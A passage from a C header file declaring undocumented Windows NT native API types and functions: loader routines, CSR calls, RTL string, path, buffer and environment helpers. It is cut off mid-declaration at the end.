_LDR_DLL_LOADED_NOTIFICATION_DATA {\n    ULONG Flags;                    //Reserved.\n    PCUNICODE_STRING FullDllName;   //The full path name of the DLL module.\n    PCUNICODE_STRING BaseDllName;   //The base file name of the DLL module.\n    PVOID DllBase;                  //A pointer to the base address for the DLL in memory.\n    ULONG SizeOfImage;              //The size of the DLL image, in bytes.\n} LDR_DLL_LOADED_NOTIFICATION_DATA, * PLDR_DLL_LOADED_NOTIFICATION_DATA;\n\ntypedef struct _LDR_DLL_UNLOADED_NOTIFICATION_DATA {\n    ULONG Flags;                    //Reserved.\n    PCUNICODE_STRING FullDllName;   //The full path name of the DLL module.\n    PCUNICODE_STRING BaseDllName;   //The base file name of the DLL module.\n    PVOID DllBase;                  //A pointer to the base address for the DLL in memory.\n    ULONG SizeOfImage;              //The size of the DLL image, in bytes.\n} LDR_DLL_UNLOADED_NOTIFICATION_DATA, * PLDR_DLL_UNLOADED_NOTIFICATION_DATA;\n\ntypedef union _LDR_DLL_NOTIFICATION_DATA {\n    LDR_DLL_LOADED_NOTIFICATION_DATA Loaded;\n    
LDR_DLL_UNLOADED_NOTIFICATION_DATA Unloaded;\n} LDR_DLL_NOTIFICATION_DATA, * PLDR_DLL_NOTIFICATION_DATA;\ntypedef const LDR_DLL_NOTIFICATION_DATA* PCLDR_DLL_NOTIFICATION_DATA;\n\ntypedef VOID(NTAPI *PLDR_LOADED_MODULE_ENUMERATION_CALLBACK_FUNCTION)(\n    _In_    PCLDR_DATA_TABLE_ENTRY DataTableEntry,\n    _In_    PVOID Context,\n    _Inout_ BOOLEAN *StopEnumeration\n    );\n\ntypedef VOID(CALLBACK *PLDR_DLL_NOTIFICATION_FUNCTION)(\n    _In_ ULONG NotificationReason,\n    _In_ PCLDR_DLL_NOTIFICATION_DATA NotificationData,\n    _In_opt_ PVOID Context);\n\n#ifndef LDR_IS_DATAFILE\n#define LDR_IS_DATAFILE(DllHandle) (((ULONG_PTR)(DllHandle)) & (ULONG_PTR)1)\n#endif\n\n#ifndef LDR_IS_IMAGEMAPPING\n#define LDR_IS_IMAGEMAPPING(DllHandle) (((ULONG_PTR)(DllHandle)) & (ULONG_PTR)2)\n#endif\n\n#ifndef LDR_IS_RESOURCE\n#define LDR_IS_RESOURCE(DllHandle) (LDR_IS_IMAGEMAPPING(DllHandle) || LDR_IS_DATAFILE(DllHandle))\n#endif\n\n#ifndef IMAGE_FILE_MACHINE_CHPE_X86\n#define IMAGE_FILE_MACHINE_CHPE_X86 0x3A64\n#endif\n\n#ifndef IMAGE_FILE_MACHINE_ARM64EC\n#define IMAGE_FILE_MACHINE_ARM64EC           0xA641\n#endif\n\n#ifndef IMAGE_FILE_MACHINE_ARM64X\n#define IMAGE_FILE_MACHINE_ARM64X            0xA64E\n#endif\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrAccessResource(\n    _In_ PVOID DllHandle,\n    _In_ CONST IMAGE_RESOURCE_DATA_ENTRY* ResourceDataEntry,\n    _Out_opt_ PVOID *Address,\n    _Out_opt_ PULONG Size);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrAddRefDll(\n    _In_ ULONG Flags,\n    _In_ PVOID DllHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrEnumerateLoadedModules(\n    _In_ ULONG Flags,\n    _In_ PLDR_LOADED_MODULE_ENUMERATION_CALLBACK_FUNCTION CallbackFunction,\n    _In_opt_ PVOID Context);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrFindResource_U(\n    _In_ PVOID DllHandle,\n    _In_ CONST ULONG_PTR* ResourceIdPath,\n    _In_ ULONG ResourceIdPathLength,\n    _Out_ PIMAGE_RESOURCE_DATA_ENTRY *ResourceDataEntry);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrFindResourceEx_U(\n    _In_ ULONG Flags,\n    _In_ PVOID 
DllHandle,\n    _In_ PLDR_RESOURCE_INFO ResourceInfo,\n    _In_ ULONG Level,\n    _Out_ PIMAGE_RESOURCE_DATA_ENTRY* ResourceDataEntry);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrFindResourceDirectory_U(\n    _In_ PVOID DllHandle,\n    _In_ PLDR_RESOURCE_INFO ResourceInfo,\n    _In_ ULONG Level,\n    _Out_ PIMAGE_RESOURCE_DIRECTORY *ResourceDirectory);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrFindEntryForAddress(\n    _In_ PVOID Address,\n    _Out_ PLDR_DATA_TABLE_ENTRY *TableEntry);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrGetDllHandle(\n    _In_opt_ PCWSTR DllPath,\n    _In_opt_ PULONG DllCharacteristics,\n    _In_ PCUNICODE_STRING DllName,\n    _Out_ PVOID *DllHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrGetDllHandleEx(\n    _In_ ULONG Flags,\n    _In_opt_ PWSTR DllPath,\n    _In_opt_ PULONG DllCharacteristics,\n    _In_ PUNICODE_STRING DllName,\n    _Out_opt_ PVOID *DllHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrGetDllHandleByMapping(\n    _In_ PVOID BaseAddress,\n    _Out_ PVOID *DllHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrGetDllHandleByName(\n    _In_opt_ PUNICODE_STRING BaseDllName,\n    _In_opt_ PUNICODE_STRING FullDllName,\n    _Out_ PVOID *DllHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrGetDllFullName(\n    _In_ PVOID DllHandle,\n    _Out_ PUNICODE_STRING FullDllName);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrGetDllDirectory(\n    _Out_ PUNICODE_STRING DllDirectory);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrSetDllDirectory(\n    _In_ PUNICODE_STRING DllDirectory);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrGetProcedureAddress(\n    _In_ PVOID DllHandle,\n    _In_opt_ CONST ANSI_STRING* ProcedureName,\n    _In_opt_ ULONG ProcedureNumber,\n    _Out_ PVOID *ProcedureAddress);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrGetProcedureAddressForCaller(\n    _In_ PVOID DllHandle,\n    _In_opt_ PANSI_STRING ProcedureName,\n    _In_opt_ ULONG ProcedureNumber,\n    _Out_ PVOID *ProcedureAddress,\n    _In_ ULONG Flags,\n    _In_ PVOID *Callback);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrGetProcedureAddressEx(\n    _In_ PVOID DllHandle,\n    
_In_opt_ PANSI_STRING ProcedureName,\n    _In_opt_ ULONG ProcedureNumber,\n    _Out_ PVOID* ProcedureAddress,\n    _In_ ULONG Flags);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrGetKnownDllSectionHandle(\n    _In_ PCWSTR DllName,\n    _In_ BOOLEAN KnownDlls32,\n    _Out_ PHANDLE Section);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrLoadDll(\n    _In_opt_ PCWSTR DllPath,\n    _In_opt_ PULONG DllCharacteristics,\n    _In_  PCUNICODE_STRING DllName,\n    _Out_ PVOID *DllHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrUnloadDll(\n    _In_ PVOID DllHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrQueryProcessModuleInformation(\n    _Out_ PRTL_PROCESS_MODULES ModuleInformation,\n    _In_ ULONG ModuleInformationLength,\n    _Out_opt_ PULONG ReturnLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrRegisterDllNotification(\n    _In_ ULONG Flags,\n    _In_ PLDR_DLL_NOTIFICATION_FUNCTION NotificationFunction,\n    _In_opt_ PVOID Context,\n    _Out_ PVOID *Cookie);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrUnregisterDllNotification(\n    _In_ PVOID Cookie);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrResSearchResource(\n    _In_ PVOID File,\n    _In_ CONST ULONG_PTR* ResIds,\n    _In_ ULONG ResIdCount,\n    _In_ ULONG Flags,\n    _Out_ LPVOID *Resource,\n    _Out_ ULONG_PTR *Size,\n    _In_opt_ USHORT *FoundLanguage,\n    _In_opt_ ULONG *FoundLanguageLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrOpenImageFileOptionsKey(\n    _In_ PCUNICODE_STRING ImagePathName,\n    _In_ BOOLEAN Wow64Path,\n    _Out_ PHANDLE KeyHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrQueryImageFileExecutionOptions(\n    _In_ PCUNICODE_STRING ImagePathName,\n    _In_ PCWSTR OptionName,\n    _In_ ULONG Type,\n    _Out_ PVOID Buffer,\n    _In_ ULONG BufferSize,\n    _Out_opt_ PULONG ResultSize);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nLdrIsModuleSxsRedirected( //LdrEntry->Flags->Redirected\n    _In_ PVOID DllHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrQueryImageFileExecutionOptionsEx(\n    _In_ PCUNICODE_STRING ImagePathName,\n    _In_ PCWSTR OptionName,\n    _In_ ULONG Type,\n    _Out_ 
PVOID Buffer,\n    _In_ ULONG BufferSize,\n    _Out_opt_ PULONG ResultSize,\n    _In_ BOOLEAN Wow64Path);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrQueryImageFileKeyOption(\n    _In_ HANDLE KeyHandle,\n    _In_ PCWSTR OptionName,\n    _In_ ULONG Type,\n    _Out_ PVOID Buffer,\n    _In_ ULONG BufferSize,\n    _Out_opt_ PULONG ResultSize);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrDisableThreadCalloutsForDll(\n    _In_ PVOID DllImageBase);\n\n#define LDR_LOCK_LOADER_LOCK_FLAG_RAISE_ON_ERRORS           0x00000001\n#define LDR_LOCK_LOADER_LOCK_FLAG_TRY_ONLY                  0x00000002\n\n#define LDR_LOCK_LOADER_LOCK_DISPOSITION_INVALID            0x00000000\n#define LDR_LOCK_LOADER_LOCK_DISPOSITION_LOCK_ACQUIRED      0x00000001\n#define LDR_LOCK_LOADER_LOCK_DISPOSITION_LOCK_NOT_ACQUIRED  0x00000002\n\n#define LDR_UNLOCK_LOADER_LOCK_FLAG_RAISE_ON_ERRORS         0x00000001\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrLockLoaderLock(\n    _In_ ULONG Flags,\n    _Out_opt_ ULONG *Disposition,\n    _Out_ PVOID *Cookie);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrUnlockLoaderLock(\n    _In_ ULONG Flags,\n    _Inout_ PVOID Cookie);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrRelocateImage(\n    _In_ PVOID NewBase,\n    _In_opt_ PSTR LoaderName,\n    _In_ NTSTATUS Success,\n    _In_ NTSTATUS Conflict,\n    _In_ NTSTATUS Invalid);\n\nNTSYSAPI\nPIMAGE_BASE_RELOCATION\nNTAPI\nLdrProcessRelocationBlock(\n    _In_ ULONG_PTR VA,\n    _In_ ULONG SizeOfBlock,\n    _In_ PUSHORT NextOffset,\n    _In_ LONG_PTR Diff);\n\nDECLSPEC_NORETURN\nNTSYSAPI\nVOID\nNTAPI\nLdrShutdownProcess(\n    VOID);\n\nDECLSPEC_NORETURN\nNTSYSAPI\nVOID\nNTAPI\nLdrShutdownThread(\n    VOID);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nLdrControlFlowGuardEnforced(\n    VOID);\n\n/*\n**  LDR END\n*/\n\n/*\n** Runtime Library API START\n*/\n\n/************************************************************************************\n*\n* CSR API.\n*\n************************************************************************************/\n\nNTSYSAPI\nULONG\nNTAPI\nCsrGetProcessId(\n    
VOID);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nCsrClientConnectToServer(\n    _In_ PWSTR ObjectDirectory,\n    _In_ ULONG ServerDllIndex,\n    _Inout_ PVOID ConnectionInformation,\n    _Inout_ ULONG *ConnectionInformationLength,\n    _Out_ PBOOLEAN CalledFromServer);\n\n/************************************************************************************\n*\n* RTL Strings API.\n*\n************************************************************************************/\n\n#define RTL_DUPLICATE_UNICODE_STRING_NULL_TERMINATE (0x00000001)\n#define RTL_DUPLICATE_UNICODE_STRING_ALLOCATE_NULL_STRING (0x00000002)\n\n#ifndef RtlInitEmptyUnicodeString\n#define RtlInitEmptyUnicodeString(_ucStr,_buf,_bufSize) \\\n    ((_ucStr)->Buffer = (_buf), \\\n     (_ucStr)->Length = 0, \\\n     (_ucStr)->MaximumLength = (USHORT)(_bufSize))\n#endif\n\nFORCEINLINE\nVOID\nNTAPI\nRtlInitEmptyAnsiString(\n    _Out_ PANSI_STRING AnsiString,\n    _Pre_maybenull_ _Pre_readable_size_(MaximumLength) PCHAR Buffer,\n    _In_ USHORT MaximumLength\n)\n{\n    memset(AnsiString, 0, sizeof(ANSI_STRING));\n    AnsiString->MaximumLength = MaximumLength;\n    AnsiString->Buffer = Buffer;\n}\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlCreateUnicodeString(\n    _Out_ PUNICODE_STRING DestinationString,\n    _In_ PCWSTR SourceString);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlCreateUnicodeStringFromAsciiz(\n    _Out_ PUNICODE_STRING DestinationString,\n    _In_ PSTR SourceString);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlInitString(\n    _Out_ PSTRING DestinationString,\n    _In_opt_ PCSZ SourceString);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlInitUnicodeString(\n    _Out_ PUNICODE_STRING DestinationString,\n    _In_opt_ PCWSTR SourceString);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlInitUnicodeStringEx(\n    _Out_ PUNICODE_STRING DestinationString,\n    _In_opt_ PCWSTR SourceString);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlEqualUnicodeString(\n    _In_ PCUNICODE_STRING String1,\n    _In_ PCUNICODE_STRING String2,\n    _In_ BOOLEAN 
CaseInSensitive);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlDuplicateUnicodeString(\n    _In_ ULONG Flags,\n    _In_ PUNICODE_STRING StringIn,\n    _Out_ PUNICODE_STRING StringOut);\n\nNTSYSAPI\nWCHAR\nNTAPI\nRtlUpcaseUnicodeChar(\n    _In_ WCHAR SourceCharacter);\n\nNTSYSAPI\nWCHAR\nNTAPI\nRtlDowncaseUnicodeChar(\n    _In_ WCHAR SourceCharacter);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlIsNameInExpression(\n    _In_ PUNICODE_STRING Expression,\n    _In_ PUNICODE_STRING Name,\n    _In_ BOOLEAN IgnoreCase,\n    _In_opt_ PWCH UpcaseTable);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlStringFromGUID(\n    _In_ GUID *Guid,\n    _Out_ PUNICODE_STRING GuidString);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlGUIDFromString(\n    _In_ PUNICODE_STRING GuidString,\n    _Out_ GUID *Guid);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlPrefixUnicodeString(\n    _In_ PCUNICODE_STRING String1,\n    _In_ PCUNICODE_STRING String2,\n    _In_ BOOLEAN CaseInSensitive);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlFormatCurrentUserKeyPath(\n    _Out_ PUNICODE_STRING CurrentUserKeyPath);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlFreeUnicodeString(\n    _In_ PUNICODE_STRING UnicodeString);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlEraseUnicodeString(\n    _Inout_ PUNICODE_STRING String);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlFreeAnsiString(\n    _In_ PANSI_STRING AnsiString);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlAnsiStringToUnicodeString(\n    _Out_ PUNICODE_STRING DestinationString,\n    _In_ PCANSI_STRING SourceString,\n    _In_ BOOLEAN AllocateDestinationString);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlUnicodeStringToAnsiString(\n    _Inout_ PANSI_STRING DestinationString,\n    _In_ PUNICODE_STRING SourceString,\n    _In_ BOOLEAN AllocateDestinationString);\n\nNTSYSAPI\nWCHAR\nNTAPI\nRtlAnsiCharToUnicodeChar(\n    _Inout_ PUCHAR *SourceCharacter);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlUnicodeToMultiByteSize(\n    _Out_ PULONG BytesInMultiByteString,\n    _In_reads_bytes_(BytesInUnicodeString) PWCH UnicodeString,\n    _In_ ULONG 
BytesInUnicodeString);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlDosPathNameToNtPathName_U(\n    _In_ PCWSTR DosFileName,\n    _Out_ PUNICODE_STRING NtFileName,\n    _Out_opt_ PWSTR *FilePart,\n    _Reserved_ PVOID Reserved);\n\nNTSYSAPI\nLONG\nNTAPI\nRtlCompareUnicodeStrings(\n    _In_reads_(String1Length) PWCHAR String1,\n    _In_ SIZE_T String1Length,\n    _In_reads_(String2Length) PWCHAR String2,\n    _In_ SIZE_T String2Length,\n    _In_ BOOLEAN CaseInSensitive);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlCopyString(\n    _In_ PSTRING DestinationString,\n    _In_opt_ PSTRING SourceString);\n\nNTSYSAPI\nCHAR\nNTAPI\nRtlUpperChar(\n    _In_ CHAR Character);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlUpperString(\n    _In_ PSTRING DestinationString,\n    _In_ PSTRING SourceString);\n\nNTSYSAPI\nLONG\nNTAPI\nRtlCompareAltitudes(\n    _In_ PCUNICODE_STRING Altitude1,\n    _In_ PCUNICODE_STRING Altitude2);\n\n//\n// preallocated heap-growable buffers\n//\ntypedef struct _RTL_BUFFER {\n    PUCHAR    Buffer;\n    PUCHAR    StaticBuffer;\n    SIZE_T    Size;\n    SIZE_T    StaticSize;\n    SIZE_T    ReservedForAllocatedSize; // for future doubling\n    PVOID     ReservedForIMalloc; // for future pluggable growth\n} RTL_BUFFER, *PRTL_BUFFER;\n\ntypedef struct _RTL_UNICODE_STRING_BUFFER {\n    UNICODE_STRING String;\n    RTL_BUFFER     ByteBuffer;\n    UCHAR          MinimumStaticBufferForTerminalNul[sizeof(WCHAR)];\n} RTL_UNICODE_STRING_BUFFER, *PRTL_UNICODE_STRING_BUFFER;\n\n//\n// These are OUT Disposition values.\n//\n#define RTL_NT_PATH_NAME_TO_DOS_PATH_NAME_AMBIGUOUS   (0x00000001)\n#define RTL_NT_PATH_NAME_TO_DOS_PATH_NAME_UNC         (0x00000002)\n#define RTL_NT_PATH_NAME_TO_DOS_PATH_NAME_DRIVE       (0x00000003)\n#define RTL_NT_PATH_NAME_TO_DOS_PATH_NAME_ALREADY_DOS (0x00000004)\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlNtPathNameToDosPathName(\n    _In_ ULONG Flags,\n    _Inout_ PRTL_UNICODE_STRING_BUFFER Path,\n    _Out_opt_ PULONG Disposition,\n    _Inout_opt_ PWSTR* 
FilePart);\n\nNTSYSAPI\nULONG\nNTAPI\nRtlIsDosDeviceName_U(\n    _In_ PCWSTR DosFileName);\n\nNTSYSAPI\nULONG\nNTAPI\nRtlGetFullPathName_U(\n    _In_ PCWSTR lpFileName,\n    _In_ ULONG nBufferLength,\n    _Out_writes_bytes_(nBufferLength) PWSTR lpBuffer,\n    _Out_opt_ PWSTR *lpFilePart);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlGetSearchPath(\n    _Out_ PWSTR *SearchPath);\n\ntypedef enum _RTL_PATH_TYPE {\n    RtlPathTypeUnknown,         // 0\n    RtlPathTypeUncAbsolute,     // 1\n    RtlPathTypeDriveAbsolute,   // 2\n    RtlPathTypeDriveRelative,   // 3\n    RtlPathTypeRooted,          // 4\n    RtlPathTypeRelative,        // 5\n    RtlPathTypeLocalDevice,     // 6\n    RtlPathTypeRootLocalDevice  // 7\n} RTL_PATH_TYPE;\n\nNTSYSAPI\nRTL_PATH_TYPE\nNTAPI\nRtlDetermineDosPathNameType_U(\n    _In_ PCWSTR DosFileName);\n\n#define HASH_STRING_ALGORITHM_DEFAULT   (0)\n#define HASH_STRING_ALGORITHM_X65599    (1)\n#define HASH_STRING_ALGORITHM_INVALID   (0xffffffff)\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlHashUnicodeString(\n    _In_ const UNICODE_STRING *String,\n    _In_ BOOLEAN CaseInSensitive,\n    _In_ ULONG HashAlgorithm,\n    _Out_ PULONG HashValue);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlAppendUnicodeStringToString(\n    _In_ PUNICODE_STRING Destination,\n    _In_ PUNICODE_STRING Source);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlAppendUnicodeToString(\n    _In_ PUNICODE_STRING Destination,\n    _In_opt_ PWSTR Source);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlCopyUnicodeString(\n    _In_ PUNICODE_STRING DestinationString,\n    _In_ PUNICODE_STRING SourceString);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlUpcaseUnicodeString(\n    _Inout_ PUNICODE_STRING DestinationString,\n    _In_ PUNICODE_STRING SourceString,\n    _In_ BOOLEAN AllocateDestinationString);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlDowncaseUnicodeString(\n    _Inout_ PUNICODE_STRING DestinationString,\n    _In_ PUNICODE_STRING SourceString,\n    _In_ BOOLEAN AllocateDestinationString);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlEraseUnicodeString(\n    _Inout_ 
PUNICODE_STRING String);\n\n#define RTL_ENSURE_BUFFER_SIZE_NO_COPY (0x00000001)\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlpEnsureBufferSize(\n    _In_ ULONG Flags,\n    _Inout_ PRTL_BUFFER Buffer,\n    _In_ SIZE_T NewSizeBytes);\n\n#define RtlInitBuffer(Buff, StatBuff, StatSize) \\\n    do {                                        \\\n        (Buff)->Buffer       = (StatBuff);      \\\n        (Buff)->Size         = (StatSize);      \\\n        (Buff)->StaticBuffer = (StatBuff);      \\\n        (Buff)->StaticSize   = (StatSize);      \\\n    } while (0)\n\n#define RtlEnsureBufferSize(Flags, Buff, NewSizeBytes) \\\n    (   ((Buff) != NULL && (NewSizeBytes) <= (Buff)->Size) \\\n        ? STATUS_SUCCESS \\\n        : RtlpEnsureBufferSize((Flags), (Buff), (NewSizeBytes)) \\\n    )\n\n#define RtlFreeBuffer(Buff)                              \\\n    do {                                                 \\\n        if ((Buff) != NULL && (Buff)->Buffer != NULL) {  \\\n            if (RTLP_BUFFER_IS_HEAP_ALLOCATED(Buff)) {   \\\n                UNICODE_STRING UnicodeString;            \\\n                UnicodeString.Buffer = (PWSTR)(PVOID)(Buff)->Buffer; \\\n                RtlFreeUnicodeString(&UnicodeString);    \\\n            }                                            \\\n            (Buff)->Buffer = (Buff)->StaticBuffer;       \\\n            (Buff)->Size = (Buff)->StaticSize;           \\\n        }                                                \\\n    } while (0)\n\n\nNTSYSAPI\nVOID\nNTAPI\nRtlRunEncodeUnicodeString(\n    _Inout_ PUCHAR Seed,\n    _Inout_ PUNICODE_STRING String);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlRunDecodeUnicodeString(\n    _In_ UCHAR Seed,\n    _Inout_ PUNICODE_STRING String);\n\n/************************************************************************************\n*\n* RTL Integer conversion API.\n*\n************************************************************************************/\n\nstruct in6_addr;\n\nNTSYSAPI\nPWSTR\nNTAPI\nRtlIpv4AddressToStringW(\n 
   _In_ const struct in_addr *Addr,\n    _Out_ PWSTR S);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlIpv4StringToAddressW(\n    _In_ PCWSTR AddressString,\n    _In_ BOOLEAN Strict,\n    _Out_ LPCWSTR *Terminator,\n    _Out_ struct in_addr *Address);\n\nNTSYSAPI\nPWSTR\nNTAPI\nRtlIpv6AddressToStringW(\n    _In_ struct in6_addr*Address,\n    _Out_writes_(46) PWSTR AddressString);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlIpv6StringToAddressW(\n    _In_ PCWSTR AddressString,\n    _Out_ PCWSTR * Terminator,\n    _Out_ struct in6_addr*Address);\n\n//taken from ph2\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlIntegerToChar(\n    _In_ ULONG Value,\n    _In_opt_ ULONG Base,\n    _In_ LONG OutputLength,\n    _Out_ PSTR String);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlCharToInteger(\n    _In_ PSTR String,\n    _In_opt_ ULONG Base,\n    _Out_ PULONG Value);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlLargeIntegerToChar(\n    _In_ PLARGE_INTEGER Value,\n    _In_opt_ ULONG Base,\n    _In_ LONG OutputLength,\n    _Out_ PSTR String);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlIntegerToUnicodeString(\n    _In_ ULONG Value,\n    _In_opt_ ULONG Base,\n    _Inout_ PUNICODE_STRING String);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlInt64ToUnicodeString(\n    _In_ ULONGLONG Value,\n    _In_opt_ ULONG Base,\n    _Inout_ PUNICODE_STRING String);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlUnicodeStringToInteger(\n    _In_ PUNICODE_STRING String,\n    _In_opt_ ULONG Base,\n    _Out_ PULONG Value);\n\n/************************************************************************************\n*\n* RTL Process/Thread API.\n*\n************************************************************************************/\n\ntypedef NTSTATUS(*PUSER_PROCESS_START_ROUTINE)(\n    PRTL_USER_PROCESS_PARAMETERS ProcessParameters\n    );\n\ntypedef NTSTATUS(*PUSER_THREAD_START_ROUTINE)(\n    PVOID ThreadParameter\n    );\n\ntypedef struct _RTL_USER_PROCESS_INFORMATION {\n    ULONG Length;\n    HANDLE Process;\n    HANDLE Thread;\n    CLIENT_ID ClientId;\n    SECTION_IMAGE_INFORMATION 
ImageInformation;\n} RTL_USER_PROCESS_INFORMATION, *PRTL_USER_PROCESS_INFORMATION;\n\n//\n// This structure is used only by Wow64 processes. The offsets\n// of structure elements should be the same as viewed by a native Win64 application.\n//\ntypedef struct _RTL_USER_PROCESS_INFORMATION64 {\n    ULONG Length;\n    LONGLONG Process;\n    LONGLONG Thread;\n    CLIENT_ID64 ClientId;\n    SECTION_IMAGE_INFORMATION64 ImageInformation;\n} RTL_USER_PROCESS_INFORMATION64, *PRTL_USER_PROCESS_INFORMATION64;\n\nNTSYSAPI\nNTSTATUS\nSTDAPIVCALLTYPE\nRtlSetProcessIsCritical(\n    _In_ BOOLEAN NewValue,\n    _Out_opt_ PBOOLEAN OldValue,\n    _In_ BOOLEAN CheckFlag);\n\nNTSYSAPI\nNTSTATUS\nSTDAPIVCALLTYPE\nRtlSetThreadIsCritical(\n    _In_ BOOLEAN NewValue,\n    _Out_opt_ PBOOLEAN OldValue,\n    _In_ BOOLEAN CheckFlag);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlCreateEnvironment(\n    _In_ BOOLEAN CloneCurrentEnvironment,\n    _Out_ PVOID *Environment);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlCreateEnvironmentEx(\n    _In_ PVOID SourceEnv,\n    _Out_ PVOID *Environment,\n    _In_ ULONG Flags);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlExpandEnvironmentStrings(\n    _In_opt_ PVOID Environment,\n    _In_reads_(SrcLength) PWSTR Src,\n    _In_ SIZE_T SrcLength,\n    _Out_writes_opt_(DstLength) PWSTR Dst,\n    _In_ SIZE_T DstLength,\n    _Out_opt_ PSIZE_T ReturnLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlExpandEnvironmentStrings_U(\n    _In_opt_ PVOID Environment,\n    _In_ PCUNICODE_STRING Source,\n    _Out_ PUNICODE_STRING Destination,\n    _Out_opt_ PULONG ReturnedLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlSetCurrentEnvironment(\n    _In_ PVOID Environment,\n    _Out_opt_ PVOID *PreviousEnvironment);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlQueryEnvironmentVariable_U(\n    _In_opt_ PVOID Environment,\n    _In_ PUNICODE_STRING Name,\n    _Out_ PUNICODE_STRING Value);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlSetEnvironmentVariable(\n    _Inout_opt_ PVOID* Environment,\n    _In_ PUNICODE_STRING Name,\n    _In_opt_ PUNICODE_STRING 
Value);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlDestroyEnvironment(\n    _In_ PVOID Environment);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlCreateProcessParameters(\n    _Out_ PRTL_USER_PROCESS_PARAMETERS *pProcessParameters,\n    _In_ PUNICODE_STRING ImagePathName,\n    _In_opt_ PUNICODE_STRING DllPath,\n    _In_opt_ PUNICODE_STRING CurrentDirectory,\n    _In_opt_ PUNICODE_STRING CommandLine,\n    _In_opt_ PVOID Environment,\n    _In_opt_ PUNICODE_STRING WindowTitle,\n    _In_opt_ PUNICODE_STRING DesktopInfo,\n    _In_opt_ PUNICODE_STRING ShellInfo,\n    _In_opt_ PUNICODE_STRING RuntimeData);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlDestroyProcessParameters(\n    _In_ PRTL_USER_PROCESS_PARAMETERS ProcessParameters);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlCreateProcessParametersEx(\n    _Out_ 